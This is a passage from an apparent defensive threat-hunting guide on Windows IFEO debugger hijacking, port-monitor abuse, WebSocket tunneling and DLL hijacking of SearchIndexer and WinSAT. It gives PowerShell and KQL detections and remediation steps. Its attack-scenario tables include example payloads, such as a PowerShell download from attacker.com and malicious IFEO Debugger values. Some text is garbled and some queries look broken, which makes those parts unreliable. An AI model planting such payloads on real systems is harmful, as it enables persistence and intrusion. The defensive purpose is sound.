Stealth: Abuses legitimate debugging mechanisms.
Execution Control: Replace or redirect legitimate processes.
Low Detection Rate: Often ignored by traditional antivirus tools.
📌 Common Attack Scenarios
Technique
Registry Key
Example Payload
Debugger Hijacking
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
Debugger = C:\Malicious\payload.exe
Application Redirection
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
Debugger = powershell.exe -ExecutionPolicy Bypass -EncodedCommand <payload>
Persistence Mechanism
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe
Debugger = cmd.exe /c start malicious.exe
DLL Hijacking
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe
Debugger = rundll32.exe C:\malicious.dll
🛡️ 2. Detection Techniques
📊 🕵️ List IFEO Registry Keys
Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" |
Select-Object Name🕵️ Search for Debugger Entries
Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" -Recurse |
Get-ItemProperty | Where-Object { $_.Debugger } |
Select-Object PSChildName, Debugger🕵️ Inspect User-Level IFEO Keys
سختحريرGet-ChildItem -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" -Recurse |
Get-ItemProperty | Where-Object { $_.Debugger } |
Select-Object PSChildName, Debugger🕵️ Check for Suspicious Debugger Paths
Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" -Recurse |
Get-ItemProperty | Where-Object { $_.Debugger -match "cmd.exe|powershell.exe|rundll32.exe" } |
Select-Object PSChildName, Debugger📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Suspicious IFEO Registry Modifications
DeviceRegistryEvents
| where RegistryKey contains "Image File Execution Options"
| where RegistryValueName == "Debugger"
| where RegistryValueData contains "cmd.exe" or RegistryValueData contains "powershell.exe" or RegistryValueData contains "rundll32.exe"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName🕵️ Trace IFEO Modifications by Processes
DeviceProcessEvents
| where ProcessCommandLine contains "reg add" and ProcessCommandLine contains "Image File Execution Options"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName🕵️ Monitor Application Execution via IFEO Hijacking
DeviceProcessEvents
| where FileName in ("notepad.exe", "explorer.exe", "svchost.exe", "winlogon.exe")
| where ProcessCommandLine contains "cmd.exe" or ProcessCommandLine contains "powershell.exe"
| project Timestamp, DeviceName, ProcessCommandLine, ParentProcessName, AccountName🕵️ Identify IFEO Persistence Mechanisms
DeviceRegistryEvents
| where RegistryKey contains "Image File Execution Options"
| where RegistryValueName == "Debugger"
| where RegistryValueData contains "malicious.exe"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName📊 Event Viewer Logs
Event ID
Description
4688
New process created (cmd.exe, powershell.exe, rundll32.exe).
4663
Registry key access detected.
4104
PowerShell script block execution.
7045
A new service was installed.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: cmd.exe /c "malicious.exe" ParentProcessName: explorer.exe
📌 Focus on Event ID 4663:
Registry access:
RegistryKey: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
🕵️ 3. Investigation Techniques
1️⃣ Validate IFEO Entries
Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" -Recurse |
Get-ItemProperty | Where-Object { $_.Debugger }2️⃣ Inspect Associated Binaries
Verify integrity of payloads:
Get-FileHash -Path "C:\Malicious\payload.exe"3️⃣ Trace Parent-Child Process Trees
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }🔧 4. Remediation Steps
📌 1. Remove Malicious IFEO Registry Entries
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" -Name "Debugger"📌 2. Validate Application Paths
Ensure legitimate binaries are in the expected paths.
📌 3. Audit Registry Access
Enable Registry Auditing for IFEO keys.
📌 4. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan🛡️ 5. Prevention Steps
Enable Command Line Auditing: Monitor
reg addcommands.Restrict Registry Access: Limit access to IFEO registry keys.
Monitor Event Logs: Focus on 4688, 4663, 7045.
Implement EDR Policies: Block suspicious registry modifications.
Enable Behavior-Based Detection: Identify abnormal parent-child relationships.
🧠 6. Key Takeaways
Monitor IFEO Keys: Regularly audit
Debuggervalues.Event Focus: Look at 4688, 4663, and 7045.
Verify Parent-Child Processes: Look for unexpected process launches.
Enable Behavioral Analytics: Detect anomalies in registry access.
🚨 Port Monitors (Registry): Advanced Threat Analysis
🔍 1. Attack Breakdown
📝 What are Port Monitors?
Port Monitors are Windows components that handle print jobs sent to printers via defined ports.
They are configured in the Windows Registry and are often legitimate but can be abused by attackers for persistence and code execution.
📑 Why Do Attackers Abuse Port Monitors?
Persistence: Automatically execute malicious code on system startup.
Stealth: Blend in with legitimate printer operations.
Evasion: Often overlooked by antivirus and security tools.
Arbitrary Code Execution: Run payloads every time a print job is initiated.
📌 Common Registry Paths for Port Monitors
HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors
HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Drivers\Version-3
📌 Common Attack Scenarios
Technique
Registry Key
Example Payload
Malicious DLL as Port Monitor
HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\MaliciousMonitor
C:\Windows\Temp\malicious.dll
Persistence via Print Spooler Service
HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\MonitorName\Driver
C:\Windows\Temp\payload.dll
Arbitrary DLL Execution
HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\AttackMonitor
powershell -c "Invoke-WebRequest http://attacker.com/payload.exe"
Hijacking Legitimate Monitors
HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Standard TCP/IP Port
C:\Windows\Temp\exploit.dll
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ List All Registered Port Monitors
Get-ChildItem -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors" | Select-Object Name🕵️ Inspect Port Monitor DLL Paths
Get-ChildItem -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors" -Recurse |
Get-ItemProperty | Select-Object PSChildName, Driver🕵️ Identify Suspicious DLL Locations
Get-ChildItem -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors" -Recurse |
Get-ItemProperty | Where-Object { $_.Driver -match "Temp|Public|AppData" } |
Select-Object PSChildName, Driver🕵️ Check for Recent Modifications
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors" |
Select-Object PSChildName, LastWriteTime🕵️ Verify Loaded Monitor DLLs in Memory
Get-Process -Name spoolsv | Select-Object -ExpandProperty Modules |
Where-Object { $_.FileName -like "*.dll" }📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Port Monitor Modifications
DeviceRegistryEvents
| where RegistryKey contains "SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors"
| where RegistryValueName == "Driver"
| where RegistryValueData contains "Temp" or RegistryValueData contains "Public"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName🕵️ Identify Suspicious DLLs Loaded by Spooler Service
DeviceFileEvents
| where InitiatingProcessFileName == "spoolsv.exe"
| where FileName endswith ".dll"
| where FolderPath contains "Temp" or FolderPath contains "Public"
| project Timestamp, DeviceName, FolderPath, FileName, AccountName🕵️ Monitor Registry Changes in Port Monitors
DeviceRegistryEvents
| where RegistryKey contains "Print\\Monitors"
| where ActionType == "RegistryValueSet"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName🕵️ Trace DLL Execution via Print Spooler
DeviceProcessEvents
| where ParentProcessFileName == "spoolsv.exe"
| where FileName endswith ".dll"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName🕵️ Identify Unauthorized Port Monitor Additions
DeviceRegistryEvents
| where RegistryKey contains "Print\\Monitors"
| where RegistryValueName == "Driver"
| where RegistryValueData !contains "System32"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName📊 Event Viewer Logs
Event ID
Description
4688
New process created (spoolsv.exe).
4663
Registry key access detected (Print\Monitors).
7045
A new service was installed.
7036
Print Spooler service state change.
📌 Focus on Event ID 4663:
Look for:
RegistryKey: HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors
📌 Focus on Event ID 7045:
A new DLL/service is loaded into Print Spooler:
ServiceName: Spooler BinaryPath: C:\Windows\Temp\malicious.dll
🕵️ 3. Investigation Techniques
1️⃣ Verify Port Monitor DLL Integrity
Get-FileHash -Path "C:\Windows\Temp\malicious.dll"Compare hash on VirusTotal.
2️⃣ Check Loaded DLLs in Spooler Process
(Get-Process spoolsv).Modules | Where-Object { $_.FileName -like "*.dll" }3️⃣ Analyze Registry Modifications
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors"🔧 4. Remediation Steps
📌 1. Remove Malicious Port Monitor Entries
Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors\MaliciousMonitor" -Recurse📌 2. Restart Print Spooler Service
Stop-Service -Name Spooler -Force
Start-Service -Name Spooler📌 3. Remove Suspicious DLLs
Remove-Item -Path "C:\Windows\Temp\malicious.dll" -Force📌 4. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan🛡️ 5. Prevention Steps
Monitor Registry Changes: Enable auditing for
Print\Monitorskeys.Restrict Registry Access: Limit administrative access to Port Monitor keys.
Monitor Print Spooler Activity: Regularly review
spoolsv.exebehavior.Implement EDR Rules: Detect unauthorized Port Monitor additions.
Review Event Logs Regularly: Focus on 4688, 4663, 7045.
🧠 6. Key Takeaways
Focus on Registry Keys:
Print\Monitorsfor unauthorized DLLs.Monitor Event IDs: 4688, 4663, 7045.
Trace Suspicious Processes: Any non-system DLLs loaded by
spoolsv.exe.Regular Audits: Ensure no unauthorized registry modifications exist
🚨 Potential Tunneled Communication via WebSocket Connection: Advanced Threat Analysis
🔍 1. Attack Breakdown
📝 What is WebSocket?
WebSocket is a communication protocol that provides full-duplex communication channels over a single TCP connection.
It is commonly used for:
Real-time applications: Chat apps, stock trading platforms, etc.
Low-latency connections: For persistent client-server connections.
📑 Why Do Attackers Use WebSocket for Tunneling?
Evasion: Traffic looks like legitimate application communication.
Persistence: Persistent connection for long-term access.
Stealth: Harder to detect due to encryption and regular WebSocket behavior.
Data Exfiltration: Data can be extracted via WebSocket frames.
Command and Control (C2): Establish persistent backdoor communications.
📌 Common Attack Scenarios
Technique
Description
Example Indicator
WebSocket C2 Channel
Malicious C2 server over WebSocket.
ws://malicious.com/c2
Data Exfiltration via WebSocket
Extract data via WebSocket frames.
wss://attacker.com/exfil
WebSocket Beaconing
Regular communication to avoid detection.
ws://hidden-server.com:8080
Fileless Malware Execution
Execute commands via WebSocket without dropping files.
ws://attack.com/command
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ List Active WebSocket Connections
Get-NetTCPConnection | Where-Object { $_.RemotePort -eq 80 -or $_.RemotePort -eq 443 } | Format-Table🕵️ Check Processes with Active WebSocket Communication
Get-Process | Where-Object { $_.Modules -match "websocket" } | Select-Object Id, ProcessName, Path🕵️ Inspect Suspicious PowerShell Processes
Get-EventLog -LogName Security | Where-Object { $_.Message -like "*powershell*" -and $_.Message -like "*Invoke-WebRequest*" }🕵️ Check for Suspicious Outbound WebSocket Communication
netstat -ano | findstr :80 :443🕵️ Identify Processes Using WebSocket Libraries
Get-ChildItem -Path "C:\Windows\System32" -Recurse -Include *.dll | Where-Object { $_.Name -like "*websocket*" }📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect WebSocket Communication by Suspicious Processes
DeviceNetworkEvents
| where RemotePort in (80, 443)
| where Protocol == "WebSocket"
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| project Timestamp, DeviceName, RemoteIP, RemotePort, ProcessCommandLine, AccountName🕵️ Identify WebSocket Communication to Unusual Domains/IPs
DeviceNetworkEvents
| where Protocol == "WebSocket"
| where RemoteUrl contains ".onion" or RemoteIP != "127.0.0.1"
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, AccountName🕵️ Trace Beaconing Patterns over WebSocket
DeviceNetworkEvents
| where Protocol == "WebSocket"
| summarize count() by RemoteIP, RemoteUrl, DeviceName
| where count > 10
| order by count desc🕵️ Monitor Outbound WebSocket Traffic to Suspicious Hosts
kDeviceNetworkEvents
| where Protocol == "WebSocket"
| where RemoteIP in ("192.168.1.100", "10.10.10.10")
| project Timestamp, DeviceName, RemoteIP, ProcessCommandLine, AccountName🕵️ Detect Encoded Commands in WebSocket Frames
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine contains "-EncodedCommand"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName,📊 Event Viewer Logs
Event ID
Description
4688
New process created (powershell.exe, cmd.exe).
5156
Network connection allowed.
4663
Object access attempt.
4104
PowerShell script block execution.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: powershell.exe -c "Invoke-WebRequest ws://malicious.com" ParentProcessName: explorer.exe
📌 Focus on Event ID 5156:
Identify outbound WebSocket connections:
RemoteAddress: malicious.com Port: 80/443
🕵️ 3. Investigation Techniques
1️⃣ Inspect WebSocket Connections
netstat -anob | findstr "80 443"2️⃣ Trace WebSocket Processes
Get-Process -Id <PID>3️⃣ Analyze Traffic Logs
Use Wireshark or Tshark:
tshark -Y "websocket"🔧 4. Remediation Steps
📌 1. Terminate Suspicious Processes
Stop-Process -Id <PID> -Force📌 2. Block Malicious IPs or Domains
New-NetFirewallRule -DisplayName "Block Malicious IP" -Direction Outbound -RemoteAddress <IP> -Action Block📌 3. Inspect Configuration Files
Review
AppData,Temp, and startup locations.
📌 4. Clear DNS Cache
Clear-DnsClientCache📌 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan🛡️ 5. Prevention Steps
Enable WebSocket Monitoring: Ensure SIEM monitors WebSocket connections.
Restrict PowerShell Execution Policies: Apply restrictive PowerShell policies.
Enable Command Line Auditing: Capture
ws://andwss://usage.Monitor Beaconing Patterns: Use behavioral analytics to detect periodic communication.
User Education: Train staff to recognize malicious URLs.
🧠 6. Key Takeaways
Monitor WebSocket Traffic: Especially outbound connections on port 80/443.
Focus on Event IDs: 4688, 5156, 4104.
Identify Parent-Child Anomalies: Unusual PowerShell execution with
ws://.
🚨 Unusual DLL Load by Indexer
🔍 1. Attack Breakdown
📝 What is the Windows Indexer (SearchIndexer.exe)?
SearchIndexer.exe)?SearchIndexer.exeis a legitimate Windows process responsible for indexing files and folders to enable fast searches on the system.It is located in:
C:\Windows\System32\SearchIndexer.exe
The process interacts with various DLL files to perform indexing tasks.
📑 Why Do Attackers Target SearchIndexer.exe?
SearchIndexer.exe?Trusted Binary: Signed by Microsoft and often ignored by security tools.
Living Off the Land (LoTL): Abuse legitimate processes to avoid detection.
Stealth: DLL injection hides malicious activity under a legitimate process.
Persistence: Loaded DLLs can maintain persistence across reboots.
Privilege Escalation: Exploit misconfigurations for elevated privileges.
📌 Common Attack Scenarios
Technique
Description
Example Indicator
DLL Side-Loading
Place a malicious DLL in a directory indexed by SearchIndexer.exe.
C:\Windows\Temp\malicious.dll
DLL Hijacking
Replace or hijack legitimate DLLs.
C:\Windows\System32\legit.dll → malicious.dll
Persistence via Registry Key
Set SearchIndexer.exe to load malicious DLLs.
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Reflective DLL Injection
Inject a DLL directly into SearchIndexer.exe.
rundll32.exe malicious.dll
Code Execution via DLL Proxying
Redirect legitimate DLL calls to malicious payloads.
C:\Users\Public\fake.dll
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ List Loaded DLLs by SearchIndexer
Get-Process -Name SearchIndexer | Select-Object -ExpandProperty Modules | Select-Object FileName✅ Expected Directories:
C:\Windows\System32\❌ Suspicious Directories:
C:\Temp\,C:\Users\Public\
🕵️ Identify DLLs Recently Loaded by SearchIndexer
Get-EventLog -LogName Security | Where-Object { $_.Message -like "*SearchIndexer.exe*" -and $_.Message -like "*.dll*" }🕵️ Inspect Parent-Child Relationship
Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "SearchIndexer.exe" } | Select-Object ProcessId, ParentProcessId, CommandLine✅ Expected Parent:
services.exe❌ Unexpected Parent:
cmd.exe,powershell.exe
🕵️ Check DLLs in Suspicious Paths
Get-ChildItem -Path "C:\Windows\Temp", "C:\Users\Public" -Filter "*.dll" -Recurse🕵️ Check for Suspicious DLL Registry Entries
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SearchIndexer.exe"📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Unusual DLL Loaded by SearchIndexer
DeviceImageLoadEvents
| where InitiatingProcessFileName == "SearchIndexer.exe"
| where FolderPath !startswith "C:\\Windows\\System32"
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessCommandLine, AccountName🕵️ Trace Suspicious DLL Load Attempts
DeviceFileEvents
| where InitiatingProcessFileName == "SearchIndexer.exe"
| where FileName endswith ".dll"
| where FolderPath contains "Temp" or FolderPath contains "Public"
| project Timestamp, DeviceName, FileName, FolderPath, AccountName🕵️ Identify Registry Persistence via DLL Load
DeviceRegistryEvents
| where RegistryKey contains "Image File Execution Options"
| where RegistryValueData contains "SearchIndexer.exe"
| where RegistryValueData contains ".dll"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName🕵️ Trace DLL Side-Loading Behavior
DeviceImageLoadEvents
| where FileName endswith ".dll"
| where FolderPath contains "Temp" or FolderPath contains "Public"
| project Timestamp, DeviceName, FileName, FolderPath, AccountName📊 Event Viewer Logs
Event ID
Description
4688
A new process was created (SearchIndexer.exe).
4663
Object access attempt (e.g., DLL access).
7036
Service state changed.
7045
A new service was installed.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: SearchIndexer.exe C:\Temp\malicious.dll ParentProcessName: services.exe
📌 Focus on Event ID 4663:
Registry key access:
RegistryKey: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
🕵️ 3. Investigation Techniques
1️⃣ Validate DLL Hashes
Get-FileHash -Path "C:\Temp\malicious.dll"Compare hash on VirusTotal.
2️⃣ Trace Parent-Child Relationships
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }3️⃣ Review Recent File Changes
Get-ChildItem -Path "C:\Temp", "C:\Users\Public" -Recurse | Sort-Object LastWriteTime -Descending🔧 4. Remediation Steps
📌 1. Terminate Malicious Processes
Stop-Process -Id <PID> -Force📌 2. Remove Malicious DLL Files
Remove-Item -Path "C:\Temp\malicious.dll" -Force📌 3. Remove Malicious Registry Entries
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SearchIndexer.exe" -Name "Debugger"📌 4. Restart Search Indexer Service
Restart-Service -Name WSearch📌 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan🛡️ 5. Prevention Steps
Monitor DLL Loading Paths: Restrict DLL loading from non-standard locations.
Enable Command Line Auditing: Track unusual execution arguments.
Restrict Registry Access: Limit access to
Image File Execution Options.Monitor Event Logs: Focus on 4688, 4663, 7045.
Enable Behavioral Analytics: Use EDR tools to detect anomalies.
🧠 6. Key Takeaways
Focus on DLL Paths: Validate
SearchIndexer.exeDLL paths.Monitor Event IDs: 4688, 4663, 7045.
Parent-Child Analysis: Validate
services.exeas the parent process.
🚨 WinSAT Bypass – Privilege Escalation via File Change: Advanced Threat Analysis
🔍 1. Attack Breakdown
📝 What is WinSAT.exe?
WinSAT.exe?WinSAT.exe(Windows System Assessment Tool) is a legitimate Windows tool used to assess system performance and capabilities.It is located at:
C:\Windows\System32\WinSAT.exeIt typically runs with elevated privileges, making it a target for privilege escalation attacks.
📑 Why Do Attackers Target WinSAT.exe?
WinSAT.exe?Trusted Binary: Signed by Microsoft and trusted by security tools.
Privilege Escalation: Runs with SYSTEM-level privileges.
Abuse DLL Search Order Hijacking: Loads DLLs from insecure paths.
File Change Vulnerability: Can be manipulated to execute arbitrary code.
Living Off the Land (LotL): Utilizes built-in tools to avoid detection.
📌 Common Attack Scenarios
Technique
Description
Example Indicator
DLL Hijacking
Place a malicious DLL in System32 or another search path.
C:\Windows\Temp\malicious.dll
File Change in Insecure Paths
Modify files loaded by WinSAT.exe.
C:\Temp\legit.dll → malicious.dll
Symlink Attack
Point critical files to attacker-controlled files.
mklink C:\Windows\Temp\config.ini C:\Malicious\config.ini
Hijack WinSAT Execution Flow
Abuse WinSAT execution flow to run malicious code.
winsat.exe disk -drive c:
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ Check WinSAT Execution History in Security Logs
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*winsat.exe*" }🕵️ List All DLLs Loaded by WinSAT
Get-Process -Name WinSAT | Select-Object -ExpandProperty Modules | Select-Object FileName✅ Expected Path:
C:\Windows\System32\❌ Suspicious Paths:
C:\Temp\,C:\Users\Public\
🕵️ Check for Modified DLLs in System Directories
Get-ChildItem -Path "C:\Windows\System32", "C:\Temp" -Filter "*.dll" -Recurse | Sort-Object LastWriteTime -Descending🕵️ Trace Parent-Child Relationship for WinSAT
Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "winsat.exe" } | Select-Object ProcessId, ParentProcessId, CommandLine✅ Expected Parent:
services.exe❌ Unexpected Parent:
cmd.exe,powershell.exe
🕵️ Check for Symlink Exploitation
Get-ChildItem -Path "C:\Windows\Temp" -Recurse | Where-Object { $_.Attributes -match "ReparsePoint" }📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect WinSAT Executed from Suspicious Paths
DeviceProcessEvents
| where FileName == "winsat.exe"
| where FolderPath !startswith "C:\\Windows\\System32"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName🕵️ Trace DLLs Loaded by WinSAT
DeviceImageLoadEvents
| where InitiatingProcessFileName == "winsat.exe"
| where FolderPath !startswith "C:\\Windows\\System32"
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessCommandLine, AccountName🕵️ Identify File Modifications by WinSAT
DeviceFileEvents
| where InitiatingProcessFileName == "winsat.exe"
| where ActionType == "FileModified"
| where FolderPath contains "Temp"
| project Timestamp, DeviceName, FileName, FolderPath, AccountName🕵️ Trace Parent Processes for WinSAT
DeviceProcessEvents
| where FileName == "winsat.exe"
| where ParentProcessName != "services.exe"
| project Timestamp, DeviceName, ParentProcessName, ProcessCommandLine, AccountName🕵️ Detect Symlink Attacks
DeviceFileEvents
| where FolderPath contains "Temp"
| where ActionType == "FileModified"
| where FileName contains ".lnk"
| project Timestamp, DeviceName, FileName, FolderPath, AccountNameDeviceName, Timestamp📊 Event Viewer Logs
Event ID
Description
4688
New process created (WinSAT.exe).
4663
Object access attempt (e.g., DLL access).
7045
A new service was installed.
5145
A network share object was accessed.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: WinSAT.exe C:\Temp\malicious.dll ParentProcessName: cmd.exe
📌 Focus on Event ID 4663:
Registry or file access:
RegistryKey: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
🕵️ 3. Investigation Techniques
1️⃣ Validate DLL Hashes
Get-FileHash -Path "C:\Temp\malicious.dll"Compare hash on VirusTotal.
2️⃣ Inspect WinSAT Configurations
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winsat.exe"3️⃣ Check Symlinks in Temp Directory
fsutil reparsepoint query "C:\Windows\Temp"🔧 4. Remediation Steps
📌 1. Terminate Malicious WinSAT Processes
Stop-Process -Name WinSAT -Force📌 2. Remove Malicious DLL Files
Remove-Item -Path "C:\Temp\malicious.dll" -Force📌 3. Remove Malicious Registry Entries
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe" -Name "Debugger"📌 4. Reset Permissions on Critical Directories
icacls "C:\Windows\Temp" /inheritance:r📌 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan🛡️ 5. Prevention Steps
Enable Command Line Auditing: Monitor
WinSAT.exeexecutions.Restrict DLL Search Paths: Prevent loading DLLs from untrusted locations.
Monitor Registry Keys:
Image File Execution Options.Enable Behavioral Analytics: Detect unusual parent-child processes.
Restrict Write Access: Limit access to
System32andTemp.
🧠 6. Key Takeaways
Validate DLL Paths: Ensure DLLs used by
WinSAT.exeare from trusted locations.Focus on Event IDs: 4688, 4663, 7045.
Trace Parent-Child Relationships: Validate
services.exeas the parent process.
Last updated